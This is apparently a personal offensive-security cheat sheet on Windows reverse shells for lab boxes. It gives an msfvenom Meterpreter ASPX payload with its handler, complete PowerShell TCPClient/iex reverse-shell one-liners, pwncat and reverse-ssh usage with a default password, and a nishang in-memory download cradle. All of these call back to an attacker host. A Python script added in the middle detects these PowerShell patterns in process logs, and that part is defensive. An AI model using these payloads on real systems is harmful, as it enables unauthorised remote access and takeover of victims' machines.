Shells

Normal Shells

Meterpreter

First, generate the file which, when executed on the target host, starts a reverse shell back to your listener. Here's an example that produces an ASPX shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx

Then, on your attacker machine, run Metasploit and start a handler for the same payload:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 10.10.14.73
run

Replace the IP address and port with your own, of course; the LHOST/LPORT given to the handler must match the values baked into the payload.

Interactive Powershell Reverse Shell

Caveat: stderr doesn't work!

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Full TTY Shells

Pwncat

Caveat: I've tested it on 2 Windows boxes in HTB, and it didn't work in either one.

It's probably a good idea to switch to bash first if you're using zsh:

exec bash --login

If your target machine doesn't have internet access, then you'll need to download the plugins first:

pwncat --download-plugins

Listen on port 4444:

pwncat -m windows -lp 4444

Then connect to the pwncat listener with either a powershell.exe or cmd.exe reverse shell (the port must match the one pwncat is listening on). For example, the PowerShell one-liner from above:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse SSH Shell

Features:

  • Full TTY shell

  • File sharing via SFTP

  • Port forwarding

Requirements:

  • At least Windows 7 or Windows Server 2008 (Windows 10 is needed for ConPTY; older Windows versions need the workaround below for full TTY functionality)

  • Linux kernel version 2.6.23 and higher

Caveats:

  • SCP doesn't seem to work

  • SSH port forwarding doesn't seem to work

  • It hangs sometimes

Evades antivirus: unknown

First, run this on your attacker machine to listen on port 4444:

./reverse-ssh -v -l :4444

Then run the following on the target machine (the UPX-packed executable can be used; on older machines use ssh-shellhost, see below):

.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP

And finally, on your attacker machine, connect to the port that reverse-ssh bound locally:

ssh -p 8888 127.0.0.1

The default password is letmeinbrudipls.

NB! If the target doesn't have ConPTY (Windows versions before Windows 10 build 17763), then you need the following workaround:

upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP

The ssh-shellhost.exe executable needs to be in the same directory as the reverse-ssh binary. It's an executable from the Windows OpenSSH port.

Rlwrap with nishang

Serve the script from your attacker machine over HTTP. Then download the nishang shell into memory on the target:

powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');

Start a listener on SOME_PORT on the attacker machine, wrapping it in rlwrap as explained here (not tested).

Then run the reverse shell on the target:

Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT
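From the defender's side, the interactive PowerShell one-liner above (TCPClient plus GetStream plus iex) and the nishang download cradle (DownloadString piped into iex, then Invoke-PowerShellTcp) leave recognisable strings in process-creation command lines. The following is an added example of a small triage script for such logs; it is not part of this note or of any tool it mentions. The log line format, the sample events and the indicator list are all constructed here from the commands shown on this page, and the combinations it treats as high confidence are an assumption, not a published ruleset.

```python
"""Triage process-creation log lines for the PowerShell reverse-shell
patterns quoted in this note (TCPClient/GetStream/iex, DownloadString
cradles, Invoke-PowerShellTcp).

Added example for detection; not code from the original note or from any
of the tools it mentions. Log format and events below are constructed."""
import re

# One rule per indicator string taken from the one-liners on the page.
# Case-insensitive because PowerShell is, and the one-liners mix case.
RULES = [
    ("tcp_client_socket",  re.compile(r"System\.Net\.Sockets\.TCPClient", re.I)),
    ("stream_read_loop",   re.compile(r"\.GetStream\(\)", re.I)),
    ("invoke_expression",  re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("download_cradle",    re.compile(r"DownloadString\(", re.I)),
    ("exec_policy_bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I)),
    ("nishang_tcp",        re.compile(r"Invoke-PowerShellTcp", re.I)),
]

# Indicator combinations treated as high confidence (assumption): a socket
# plus a read loop plus iex is the shell itself; a cradle plus iex is the
# in-memory loader; the nishang function name is specific enough on its own.
HIGH_CONFIDENCE = [
    frozenset({"tcp_client_socket", "stream_read_loop", "invoke_expression"}),
    frozenset({"download_cradle", "invoke_expression"}),
    frozenset({"nishang_tcp"}),
]

# Constructed log format: "<timestamp> host=<h> user=<u> cmd=<command line>"
EVENT_RX = re.compile(r"host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# Constructed sample events; ws01 and ws03 reuse the page's one-liners.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:00Z host=ws01 user=alice cmd=powershell -nop -exec bypass -c "
    "\"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.73',4444);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\"",
    "2024-01-01T10:00:05Z host=ws02 user=bob cmd=powershell -c Get-ChildItem C:\\Users",
    "2024-01-01T10:00:09Z host=ws03 user=svc cmd=powershell iex (New-Object Net.WebClient)"
    ".DownloadString('http://10.10.14.73:8000/Invoke-PowerShellTcp.ps1');",
    "2024-01-01T10:00:12Z host=ws04 user=carol cmd=cmd.exe /c whoami",
]


def score_command_line(cmdline):
    """Return (set of matched indicator names, high_confidence flag)."""
    hits = {name for name, rx in RULES if rx.search(cmdline)}
    high = any(combo <= hits for combo in HIGH_CONFIDENCE)
    return hits, high


def triage(lines):
    """Parse constructed-format log lines and return one finding per line
    that matched at least one indicator, sorted indicators for stable output."""
    findings = []
    for line in lines:
        m = EVENT_RX.search(line)
        if not m:
            continue  # not in the expected shape; skip rather than guess
        hits, high = score_command_line(m["cmd"])
        if hits:
            findings.append({
                "host": m["host"],
                "user": m["user"],
                "indicators": sorted(hits),
                "high_confidence": high,
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        level = "HIGH" if f["high_confidence"] else "low"
        print(f"{level:4} {f['host']:5} {f['user']:6} {', '.join(f['indicators'])}")
```

Single indicators such as `-exec bypass` or `iex` on their own are noisy in administrative scripting, which is why the script only raises confidence when the strings that make up one of the page's one-liners appear together; in practice the same logic would be fed from Sysmon event 1 or Windows 4688 command lines rather than the constructed format used here.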

Socat

I think socat can be used to make a decent reverse shell?
